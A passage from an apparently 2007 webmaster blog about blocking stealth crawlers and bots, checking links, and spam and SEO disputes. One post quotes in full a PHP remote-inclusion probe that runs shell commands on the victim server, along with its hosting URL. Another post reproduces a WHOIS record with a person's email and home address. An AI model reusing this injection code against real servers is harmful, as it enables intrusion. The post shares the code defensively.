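    return [phrase for phrase in DEAD_SITE_PHRASES if phrase in text]
```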

5. Compare the previous WHOIS profile.

Save copies of all the whois information you get during link checking and use it in future link checks to detect ownership changes. Assuming the link checker passes the site after all of the above profile checks, compare the current WHOIS information to the last time you checked the site. Odds are that if the site has changed hands it no longer contains the content you originally linked to and may be a link you want to remove.
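Here's a minimal sketch of that comparison. Which WHOIS fields to track is an assumption on my part (registrar, registrant name/organization and name servers), and since WHOIS formats vary by registry, expect to adjust the field names; store each link's profile between runs so the next check has something to compare against.

```python
# Hypothetical choice of fields to compare; WHOIS formats differ between registries.
TRACKED_FIELDS = ("registrar", "registrant", "registrant name",
                  "registrant organization", "name server")


def whois_profile(whois_text: str) -> dict[str, set[str]]:
    """Collect the tracked 'Field: value' lines into a field -> values mapping."""
    profile: dict[str, set[str]] = {}
    for line in whois_text.splitlines():
        key, sep, value = line.partition(":")
        key, value = key.strip().lower(), value.strip().lower()
        if sep and value and key in TRACKED_FIELDS:
            profile.setdefault(key, set()).add(value)
    return profile


def changed_fields(old: dict[str, set[str]], new: dict[str, set[str]]) -> list[str]:
    """Names of tracked fields whose values differ between two profiles."""
    return sorted(k for k in old.keys() | new.keys() if old.get(k) != new.get(k))
```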

Summary

Now you know all of my basic ingredients for building a super charged link checker and should have some ideas on how to spruce up your own link checker. Building the ultimate link checker isn't something you can finish in a day, nor does the work ever stop, because the internet is constantly changing. However, if you have a ton of outbound links or run a large directory, a super charged link checker is the only way to check links, and time spent building it is far better spent than manually checking tens of thousands of links by hand.

Another Stealth Crawler via Extended Host

Here we go with another stealth crawler operating from Extended Host:

194.110.162.19 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
194.110.162.225 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
194.110.162.227 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
194.110.162.228 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
194.110.162.231 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
194.110.162.84 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
194.110.162.85 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
194.110.162.86 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
194.110.162.87 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
194.110.162.88 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
194.110.162.89 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
194.110.162.92 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
194.110.162.93 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
194.110.162.94 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
194.110.162.96 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

Here's the Extended Host IP range:

inetnum: 194.110.160.0 - 194.110.163.255
netname: EXTHOST-NET
descr: Extended Host

They just keep coming and I just keep closing more holes they slither through.

Tuesday, November 06, 2007

Even MORE Stealth Crawling Hosted at Corporate Colo

Here's yet another stealth crawler that came from Corporate Colocation's IP range:

74.124.192.137 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
74.124.192.138 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
74.124.192.161 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
74.124.192.162 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
74.124.192.175 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
74.124.192.181 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
74.124.192.183 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
74.124.192.195 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
74.124.192.198 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
74.124.192.215 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)

Here's their list of IP ranges:

Corporate Colocation Inc. MZIMA01-CUST-CORPCOLO02
64.235.225.8 - 64.235.225.15

Corporate Colocation Inc. MZIMA02-CUST-CORPCOLO04
216.193.219.0 - 216.193.219.255

Corporate Colocation Inc. MZIMA02-CUST-CORPCOLO01
216.193.197.0 - 216.193.197.255

Corporate Colocation Inc. MZIMA02-CUST-CORPCOLO03
216.193.208.0 - 216.193.208.63

Corporate Colocation Inc. CORPCOLO-206-62-132-0-22
206.62.132.0 - 206.62.135.255

Corporate Colocation Inc. CORPCOLO-206-62-144-0-23
206.62.144.0 - 206.62.145.255

Corporate Colocation Inc. CORPCOLO-206-62-146-0-22
206.62.146.0 - 206.62.149.255

Corporate Colocation Inc. MZIMA02-CUST-CORPCOLO05
216.193.251.0 - 216.193.251.255

Corporate Colocation Inc. NET-216-152-242-0-24
216.152.242.0 - 216.152.242.255

Corporate Colocation Inc. CORPCOLO-NET
205.134.224.0 - 205.134.255.255

Corporate Colocation Inc. NET-216-151-149-0-24
216.151.149.0 - 216.151.149.255

Corporate Colocation Inc. MZIMA02-CUST-CORPCOLO10
72.37.152.0 - 72.37.152.255

Corporate Colocation Inc. MZIMA03-CUST-CORPCOLO09
72.37.131.80 - 72.37.131.87

Corporate Colocation Inc. CORPCOLO-NET02
66.117.0.0 - 66.117.15.255

Corporate Colocation Inc. CORPCOLO-NET03
74.124.192.0 - 74.124.223.255

Corporate Colocation MZIMA01-CUST-CORPCOLO05
64.235.225.224 - 64.235.225.239

Corporate Colocation MZIMA01-CUST-CORPCOLO06
64.235.227.96 - 64.235.227.111

Corporate Colocation MZIMA01-CUST-CORPCOLO08
64.235.238.224 - 64.235.238.231

Corporate Colocation MZIMA01-CUST-CORPCOLO07
64.235.237.64 - 64.235.237.71
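Since these are given as start-end ranges, they need converting to CIDR blocks before most firewalls or .htaccess files will take them, and some (like 206.62.146.0 - 206.62.149.255) don't fit in a single block. Here's a minimal sketch using Python's ipaddress module to produce Apache 2.2-style `Deny from` lines; it assumes your .htaccess already has `Order Allow,Deny` and `Allow from all`, and Apache 2.4 would want `Require not ip` inside a `<RequireAll>` block instead.

```python
import ipaddress


def deny_lines(ranges):
    """Turn inclusive (start, end) IPv4 ranges into 'Deny from <CIDR>' lines."""
    lines = []
    for start, end in ranges:
        networks = ipaddress.summarize_address_range(
            ipaddress.IPv4Address(start), ipaddress.IPv4Address(end)
        )
        lines.extend(f"Deny from {net}" for net in networks)
    return lines


# A few of the Corporate Colocation ranges listed above.
CORPCOLO_SAMPLE = [
    ("74.124.192.0", "74.124.223.255"),
    ("206.62.146.0", "206.62.149.255"),
    ("72.37.131.80", "72.37.131.87"),
]
```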

That little list of IPs should give you all some fun adding to your firewalls and .htaccess files.

Enjoy.

More Stealth Crawling Hosted at OC3Networks

No clue who or what this crawler is but it's coming from OC3Networks datacenter.

Here's the IPs and the user agent coming from their network:

72.11.155.106 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.112 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.113 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.125 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.131 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.137 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.154 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.197 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.204 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.211 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.219 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.223 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.228 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.236 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.237 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.246 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.34 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.37 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.45 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.5 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.57 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.61 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.63 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.64 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.67 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.90 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)

Here's their ranges of IPs:

OC3 Networks & Web Solutions, LLC OC3-NETWORKS
66.63.160.0 - 66.63.191.255

OC3 Networks & Web Solutions, LLC OC3-NETWORKS
72.11.128.0 - 72.11.159.255

OC3 Networks ISWT-207-178-200-0
207.178.200.0 - 207.178.200.63

OC3 Networks OC3-NETWORKS-DSLUSERS
66.63.163.0 - 66.63.164.255

OC3 Networks OC3-NETWORKS--DEDICATED-SERVERS-RANGE
66.63.176.0 - 66.63.176.255

OC3 Networks OC3-NETWORKS--DEDICATED-SERVERS-RANGE
66.63.179.0 - 66.63.179.255

OC3 Networks OC3-NETWORKS---COLOCATIONS-VOIP
66.63.178.0 - 66.63.178.127

Not sure I'd block the DSLUSERS range but the rest look like fair game.

Enjoy.

Munax Stealth Crawler

Stumbled upon a stealth crawler hitting my site from multiple IPs and it turned out to belong to Munax who claims right up front that they haven't named their crawler and fake being a legit user which is pretty damned scummy.

My guess would be they figured out they couldn't access sites with good security so they decided to get around it without a bot name, but here's some bullshit excuse they use:

Our crawler does not have a "name", yet. Instead it announces itself to be a standard web browser, a "Mozilla 4.0" kind-of-browser compatible with the browser Microsoft Internet Explorer 6.0, running on the Windows NT 5.1 operating system. The reasons for this are: (a) Today, web servers are intelligent enough to react on the type of user agent. If our crawlers had a name, say MunaxRob or something like that, many web servers would not know about it and would return junk or maybe nothing at all. (b) We want the web server to return a page to us where the page looks as close as possible to a page that can be viewed with a standard web browser. This, to create the best possible indexing in our database and a WYSIWYG experience for anybody that is visiting our search engine.

Well listen up fuckheads, there's a reason we would return junk or nothing at all which is we don't want your goddamn spider crawling our fucking website!

What part of FUCK OFF! don't you understand that drives you to bypass our security and crawl regardless of whether we want you or not?

Amazingly they admit their IP range:

Your site might have been visited by our crawlers, with network addresses in the range of 82.99.30.2 - 82.99.30.73. Here is a short FAQ answering some of the questions you might have:

I've confirmed this crawl range in my logs:

82.99.30.15 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
82.99.30.17 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
82.99.30.21 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
82.99.30.25 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
82.99.30.26 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
82.99.30.30 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
82.99.30.33 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
82.99.30.37 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
82.99.30.45 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
82.99.30.54 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
82.99.30.67 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

Well, this fucking crawler is now blocked.

Bunch of bullshit....

Sunday, October 28, 2007

Hackers Try Another Botnet Attack

Here we go again with the hackers making another run at one of my websites trying to inject PHP code into a site that doesn't even have PHP enabled which is amusing at best.

The script they were trying to inject was located here:

http://www.doncapone.com.br/.,/n?
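Attempts like this are usually remote file inclusion probes: the attacker stuffs a remote URL into a query parameter hoping a careless PHP include() will fetch and run it. The post doesn't say which parameter was targeted, so here's a generic minimal sketch that flags any query parameter whose value is itself a remote URL; the request path and parameter name in the example are made up.

```python
from urllib.parse import parse_qsl, urlsplit


def looks_like_remote_include(request_url: str) -> bool:
    """Flag requests where a query parameter's value is itself a remote URL."""
    query = urlsplit(request_url).query
    for _name, value in parse_qsl(query, keep_blank_values=True):
        if value.lower().startswith(("http://", "https://", "ftp://")):
            return True
    return False


# Hypothetical request shaped like the attack above.
example = "/index.php?page=http://www.doncapone.com.br/.,/n?"
```

A site that legitimately passes URLs in query strings (a redirect script, say) would need a whitelist on top of this.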

Here's a copy of their PHP script for your viewing pleasure:

<?
$ker = @php_uname();
$osx = @PHP_OS;
echo "f7f32504cabcb48c21030c024c6e5c1a<br>"; // md5('xeQt');
echo "Uname:$ker<br>";
echo "SySOs:$osx<br>";
if ($osx == "WINNT") { $xeQt="ipconfig -a"; }
else { $xeQt="id"; }
$hitemup=ex($xeQt);
echo $hitemup;
function ex($cfe)
{
       $res = '';
       if (!empty($cfe))
       {
               if(function_exists('exec'))
               {
                       @exec($cfe,$res);
                       $res = join("\n",$res);
               }
               elseif(function_exists('shell_exec'))
               {
                       $res = @shell_exec($cfe);
               }
               elseif(function_exists('system'))
               {
                       @ob_start();
                       @system($cfe);
                       $res = @ob_get_contents();
                       @ob_end_clean();
               }
               elseif(function_exists('passthru'))
               {
                       @ob_start();
                       @passthru($cfe);
                       $res = @ob_get_contents();
                       @ob_end_clean();
               }
               elseif(@is_resource($f = @popen($cfe,"r")))
               {
                       $res = "";
                       while(!@feof($f)) { $res .= @fread($f,1024); }
                       @pclose($f);
               }
       }
       return $res;
}
?>

Here's a list of IPs, with reverse DNS, from the botnet involved in the attack, so you can see that any machine can be infected; it's pretty random:

121.119.172.33
newsclip.be

134.76.41.1
saturn.roentgen.physik.uni-goettingen.de.

195.14.56.16
netgenic.pac.ru.

195.205.77.30
bsd.page.pl.

195.77.190.208
www.medinalaboral.com.

198.189.237.157
garnet.csumb.edu.

200.89.153.204
gw0fibertel.tenroses.com.ar.

203.146.127.143
mail.wisetair.com.

203.146.129.149
not found: 3(NXDOMAIN)

203.81.43.130
130.128.43.81.203.in-addr.arpa.
mx1.mail.cliqo.com.

204.8.46.250
eaglemedia.com.

207.176.224.189
207-176-224-189.static-ip.ravand.ca.

207.44.178.47
mail.tmanshost.com.

208.101.13.198
server-center.net.

209.61.181.243
server4.sulek.net.

210.48.156.42
dns7.kutu.net.

211.62.35.151
not found: 3(NXDOMAIN)

212.110.119.85
www05.makolan.net.

212.174.113.76
mail.tros.gen.tr.

212.39.26.44
web22.hostdeck.com.

213.190.51.202
ns1.laisvas.lt.

213.218.141.11
caracas15.ecritel.net.

221.143.48.237
221-143-48-237.tongkni.co.kr.

222.231.2.50
b50.nskorea.com.

62.4.100.2
host.mantlik.cz.

64.91.251.107
nexus.sourcedns.com.

66.11.122.105
service66.11.122-105.serverprovider.com.

66.55.78.16
66-55-78-16.yourhostingprovider.net.

70.130.237.252
;; connection timed out; no servers could be reached

74.50.13.48
deneb.lunarpages.com.

81.173.242.33
gate.eyepower.de.

81.255.205.81
mail.chaffenay.com.

82.116.79.30
reseller.sircon.net.

82.195.230.142
gdp-lin-230-142.as16215.net.

82.67.222.122
bdy93-1-82-67-222-122.fbx.proxad.net.

85.13.194.179
cherryco.marketing-internet.com.

86.125.92.68
6-125-92-68.brasov.rdsnet.ro.

A pretty random list of sites infected by this botnet, from locations all over the world.

The bot blocker shut down all of these attempts, but I wonder what they'll try next time.
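The post doesn't say which tool produced the reverse DNS list (the `not found: 3(NXDOMAIN)` and `;; connection timed out` lines look like output from command-line DNS tools). As a rough Python equivalent, assuming a working resolver, a lookup like this could be scripted as follows; `reverse_dns` and `ptr_name` are hypothetical helper names.

```python
import ipaddress
import socket


def ptr_name(ip: str) -> str:
    """The in-addr.arpa name a resolver queries when reverse-resolving ip."""
    return ipaddress.ip_address(ip).reverse_pointer


def reverse_dns(ip: str) -> str:
    """Return the PTR hostname for ip, or a short note when there isn't one."""
    try:
        hostname, _aliases, _addresses = socket.gethostbyaddr(ip)
        return hostname
    except socket.herror:
        # No PTR record, comparable to the NXDOMAIN entries in the list.
        return "not found"
    except OSError as exc:
        # Other resolver problems, such as timeouts.
        return f"lookup failed: {exc}"
```

For example, `ptr_name("203.81.43.130")` gives `130.43.81.203.in-addr.arpa`, and `reverse_dns("134.76.41.1")` asks the resolver for the hostname behind that address. Note that `gethostbyaddr` also consults the local hosts file, so results can differ slightly from a pure DNS query.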

Kavam's SearchMe Charlotte Taking Screen Shots?

SearchMe has been around for a while, but it looks like they're now taking screen shots.

For the novice looking at log files: any time you see Firefox for Linux methodically hitting pages over a long period of time, you can be almost certain that someone is making screen shots, especially when the IPs come from a data center.
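That rule of thumb can be turned into a rough log check. This is a minimal sketch, assuming your log is already parsed into `(ip, timestamp, user_agent)` tuples; the thresholds `min_hits` and `min_span` are arbitrary example values, and it doesn't check whether the IP belongs to a data center, which you'd still want to look up by hand.

```python
from collections import defaultdict
from collections.abc import Iterable
from datetime import datetime, timedelta


def looks_like_linux_firefox(user_agent: str) -> bool:
    """True for desktop Firefox user agents running under X11 on Linux."""
    return "X11" in user_agent and "Linux" in user_agent and "Firefox/" in user_agent


def flag_screenshot_suspects(
    entries: Iterable[tuple[str, datetime, str]],
    min_hits: int = 50,
    min_span: timedelta = timedelta(hours=6),
) -> list[str]:
    """Flag IPs whose Linux Firefox requests are both numerous and spread
    over a long stretch of time (min_hits and min_span are example thresholds).
    """
    times: dict[str, list[datetime]] = defaultdict(list)
    for ip, when, user_agent in entries:
        if looks_like_linux_firefox(user_agent):
            times[ip].append(when)
    return sorted(
        ip
        for ip, stamps in times.items()
        if len(stamps) >= min_hits and max(stamps) - min(stamps) >= min_span
    )
```

A plain substring test like this will also flag real people browsing with Firefox on Linux, so treat the output as a list of IPs to investigate, not to block automatically.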

Not only did I see screen shots being taken on my web pages, but I've seen their screen shot bot pulling images I have embedded on other web sites, so they're aggressively taking screen shots across the web.

Does the fact that they're taking screen shots mean that they're coming out of stealth mode and launching a new search service?

I'm speculating that this may be the case because taking screen shots is a very time-consuming process, and it wouldn't make sense to take them only to let them all sit around going stale and out of date, unless you intended to go public with some new search service soon.

Here's the screen shot activity to look for in your web logs:

209.249.86.17 - "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.5) Gecko/20070728 Firefox/2.0.0.5"

That IP belongs to:

Kavam MFN-T595-209-249-86-0-24 (NET-209-249-86-0-1)
209.249.86.0 - 209.249.86.255

Other activity in that IP range:

01/02/2007 "Mozilla/5.0 (compatible; Charlotte/1.0b; http://www.betaspider.com/)"

03/05/2007 "Mozilla/5.0 (compatible; Charlotte/1.0b; http://www.searchme.com/support/)"

Looks like Kavam is a legit company with funding and all that, but taking screen shots without changing the user agent to identify that's what they're doing is kind of lame. Very little is known about them other than that they built Wikiseek, which has nothing to do with why they're attempting to crawl and screen shot my main web site, so they obviously have something new in the works.

I've decided to block them temporarily, until they come out of stealth mode and I can see what they're up to, because I don't need anyone crawling a site with over 100K pages unless they give me a damn good reason ;)
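The post doesn't say how the block is implemented. As a minimal application-level sketch, assuming you check each request's remote address yourself, the Kavam range from the WHOIS record (209.249.86.0 - 209.249.86.255, which is the network 209.249.86.0/24) can be tested with Python's `ipaddress` module; `BLOCKED_NETWORKS` and `is_blocked` are hypothetical names.

```python
import ipaddress

# Range taken from the WHOIS record: 209.249.86.0 - 209.249.86.255.
BLOCKED_NETWORKS = [ipaddress.ip_network("209.249.86.0/24")]


def is_blocked(ip: str) -> bool:
    """True if ip falls inside any blocked network."""
    address = ipaddress.ip_address(ip)
    return any(address in network for network in BLOCKED_NETWORKS)
```

In practice a block like this usually lives in the web server or firewall configuration instead, but the range arithmetic is the same: every address from .0 through .255 in that /24 matches.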

Tuesday, October 23, 2007

Did NBCSearch Spam?

I'd heard of NBCSearch and Mainstream Advertising before but never paid them any attention until two copies of the following showed up in my generic inboxes the other day: sales, support, info, you know, the addresses most companies have that anyone can use to send email when they don't actually know a real email address.

Hello,

My name is Sarkis Arshakuni and I am the Director of Business Development here at NBCSearch, SearchABC, and the Mainstream Search Network of sites. I have heard great things about the capability of your network and I know we would benefit from working together.

I'm interested in pursuing a strategic partnership. Mainstream Search and it's family of sites make us the largest online advertising company. And with the success of TrueClick our click fraud detection technology we have been developing and growing relationships with several tier one search companies. We have broad coverage, high CPCs and the best 2nd tier traffic on the market.

Below is our XML Test Feed for your review:

http://carcassonne.ozemailer.com/[snip]

Feel free to paste this into a browser and change out the keyword so you can see the strength of our coverage and bid prices. Once you view these, I am confident you will want to begin ASAP. Here's our sign up link to get started:

http://carcassonne.ozemailer.com/[snip]

Please let me know if you have any questions or will be available for a quick chat about this partnership. I look forward to hearing from you or the appropriate person so we can explore further.

Thanks in advance,

Sarkis Arshakuni
Business Development
[snip]
________________________
http://www.Mainstreamadvertising.com
http://www.Mainstreamasearch.com
[snip]

Anyway, out of curiosity I went to NBCSearch and McAfee SiteAdvisor went off. Then I noticed they don't appear to be indexed in Google whatsoever and, of all things, they have private registration on their domain name, which is odd for a corporation.

Domain Name: NBCSEARCH.COM

Registrant [207419]:
Moniker Privacy Services

Lots of red flags, so I think I'll skip inquiring about advertising.

But thanks for asking... not!

Saturday, October 06, 2007

Express Link or Spam Exchange?

Someone posted to my blog today about ExpressLinkExchange under the name Shanon Sandquist, who appears to have been quite busy lately.

Hey, this is an awesome blog you've
got here!! I'm definitely going to
bookmark it! By the way, I found a
awesome site that has similar kind of
link exchange kind of stuff! If you get
time, check it out.

www.ExpressLinkExchange.com

Posted by Shanon Sandquist to IncrediBILL's Random Rants at 10/06/2007 1:03 AM

Normally I would assume it's a bogus name on one of those off-topic blog comments, but that name shows up in the WHOIS record for ExpressLinkExchange, so it's either the real person openly posting the same crap all over the place or someone trying to give them some reputation management issues.

whois expresslinkexchange.com

directNIC makes this information available "as is", and does not guarantee
its accuracy.

Registrant:
Homeworkers
2084 West, 12974 South
Riverton, UT 84065
US

Domain Name: EXPRESSLINKEXCHANGE.COM

Administrative Contact:
Sandquist, Shanon Shanon3@Walla.com
2084 West, 12974 South
Riverton, UT 84065
US

Technical Contact:
Sandquist, Shanon Shanon3@Walla.com
2084 West, 12974 South
Riverton, UT 84065
US

Domain servers in listed order:
NS1.MPENET.COM 65.222.14.2
NS2.MPENET.COM 65.222.14.3

Hey, it looks like a great service, what could be wrong with signing up for links and making free money?

Right on the home page it promises to "...increase a website's traffic, link popularity and search engine ranking..." and there's even a directory of member sites!

Here's the best part on the FAQ page:

5. Does ExpressLinkExchange.com abide by the major search engine guidelines?

Yes, it does. The ExpressLinkExchange.com Link Exchange service is fully compliant with all of the major search engine guidelines and standards. We do not promote "blackhat" techniques such as cloaking, hidden text, or the use of doorway pages in order to artificially manipulate the search engine results. The ExpressLinkExchange.com Link Exchange service will help naturally boost your website's link popularity in the same manner that any typical manual link exchange campaign would. The only difference with our system is that it is fully automated. In addition, we provide our members with helpful articles to educate them on how to properly optimize their web pages for increased search engine ranking. Click here for more details on this topic.

Interesting point of view, because the Google Webmaster Guidelines expressly say:

Quality guidelines - basic principles

Don't participate in link schemes designed to increase your site's ranking or PageRank. In particular, avoid links to web spammers or "bad neighborhoods" on the web, as your own ranking may be affected adversely by those links.

OK, which one of them would you believe?

Well, let's all sign right up so we'll all be in a members list Google can easily track. Good idea!

Sounds like a plan to me!

Friday, October 05, 2007

SEO Means Squabbling Endlessly Online

The S in SEO stands for Squabbling because that's all they ever do, all day every day, Endlessly and Online.

What do they squabble about?

The usual crap, the same things they've been squabbling about for years: hat colors, search engine spamming and on and on ad nauseam.

This week they're raking Rand over the coals, calling it "unprofessional" that he outed a site selling paid links. Sadly, Rand caved to peer pressure and removed the link to the outed site, so he lost a little respect here, because if you have an opinion and say something you feel righteous about, you should stick to your guns and stand behind it.

Besides, can anyone believe that the same man who obviously flaunts fashion faux pas with the brightest yellow shoes, just so you can see him a mile away at a search conference, would give a rat's ass about someone's opinion of outing a site?

I'm stunned.

The thing that stuns me even more is that the SEO community obviously wants these sites hidden from view because many of them use those paid links to game the search engines.

Think about it: you wouldn't want your favorite paid link juice site publicly outed, would you?

Might cramp your style, and you would have to do SEO the old-fashioned way, with a compelling site and content people naturally link to, instead of gaming the system.

What did Rand really do wrong except expose a site violating Google's guidelines?

I think people were worried it would start an avalanche of outing paid link sites and they would quickly become a thing of the past.

Assuming Rand doesn't use those types of sites and doesn't live in an SEO glass house, I would stick to my guns, because it's an educational thing for the novices out there to see and avoid, a public service actually, with a real live example of what Google's guidelines tell you not to do.

It doesn't matter what I think; Rand already caved. Let the squabbling continue.

Department of Homeland Spam

A couple of days ago the DHS (Dept. of Homeland Security), ironically, turned out to be running an insecure listserv to send email, which resulted not only in a mini-DDoS of all its list subscribers but culminated in a complete breach of all the email addresses on that list when they tried to fix it.

Flip wrote a hysterical play-by-play account of the DHS spam which is worth reading to the bitter end because it just gets worse and worse.

Makes me a little concerned about who's securing the Homeland Security!

Then I found a quote from one of the emails in his blog post that fingers the company responsible:

Please note that NICC is aware of the situation and has notified Computer Science Corp to disable the open server...

It also turns out that it's not even a simple list server:

...Lotus Domino Release 7.0.2FP1 server hosted by a government contractor that reflects email to a list of thousands of subscribers

Can you imagine if this weakness was exposed during an actual crisis and people didn't get the information they needed in a timely manner?

I feel more secure now, don't you?

Wednesday, October 03, 2007

Debunking the FUD around "rel=nofollow"

I finally decided to put my thoughts in black and white and let people know why I think Emperor G has no clothes, which is why they invented "rel=nofollow" in the first place.

Think about how much we hear about relevance.

Relevance is all the buzz, from Google's search results to the targeting of AdSense ads, so they must be the experts in relevance, right?

OK, if they have such a good lock on relevance, then why couldn't Google simply determine that spam links in comments on blogs, forums and wikis had NO relevance to the topic of the post and discount those links automatically?

Once you grasp the implications of my last paragraph you'll realize that "rel=nofollow" is bogus.

If you're still not sure, think about this simple scenario for just a moment: Grandma posts on her crochet blog about a new crochet pattern, and then a spammer spams her blog with Viagra or a bunch of other pharma and off-topic crap.

Would we be led to believe that the world's greatest search engine with the best search relevance bar none can't tell that the link and comments about Viagra don't match the content of the blog post and can't automatically discount those links without a "rel=nofollow"?

Apparently not, and here comes "rel=nofollow" with all the FUD and fear mongering about who you link to, who you can sell links or legitimate ads to, and whether you can pass link juice without the risk of being penalized if you don't bend to the will of the same company that ironically makes its billions selling paid links.

Does anyone besides me smell a hand job penalty for paid links?

If Google can't tell that the Viagra ad was off topic on Granny's Crochet blog then how are they detecting paid links?

With all that said, I think "rel=nofollow" is at minimum a good idea for automatically discounting random links from random people posting on blogs, forums and wikis, just to take the possible SEO reward out of spam. However, that won't stop the spam, because the same stupid people who open those emails and go to those websites will still click the links in the spam posts, so the direct traffic will still be a big enough incentive to keep spamming websites. The only upside is that it thwarts their efforts to gain rank in the search engines.
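Applying "rel=nofollow" to comment links is simple enough to sketch. This assumes comments store the link URL and anchor text separately; `render_comment_link` is a hypothetical helper, not part of any blog platform. It also refuses anything that isn't an http or https URL (such as `javascript:` links), an extra precaution the post doesn't mention.

```python
import html
from urllib.parse import urlparse


def render_comment_link(url: str, text: str) -> str:
    """Render a commenter-supplied link with rel="nofollow".

    Anything that isn't a plain http/https URL is rendered as escaped text
    instead of a link.
    """
    if urlparse(url).scheme.lower() not in ("http", "https"):
        return html.escape(text)
    safe_url = html.escape(url, quote=True)
    return f'<a href="{safe_url}" rel="nofollow">{html.escape(text)}</a>'
```

The link still works for anyone who clicks it, which is exactly the limitation described in the post: the nofollow only removes the search engine reward, not the direct traffic.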

However, if Google's relevance detection, especially with off topic links was really that good, the spam posts never would've been a problem in the first place.

Does anyone smell a rat?

Unfortunately, the rat I smell is mixed-content sites, such as many news sites, forums and blogs with random topics per page, which probably caused too many false positives for an algorithm to automatically discard what would appear to be off-topic links.

Therefore, the algorithm probably failed, and here we are, scared into policing ourselves with "rel=nofollow", while every now and then someone caught selling a paid link is thrown on the sacrificial altar just to stir up some high-profile FUD and keep everyone in line.

That's my theory, what do you think?
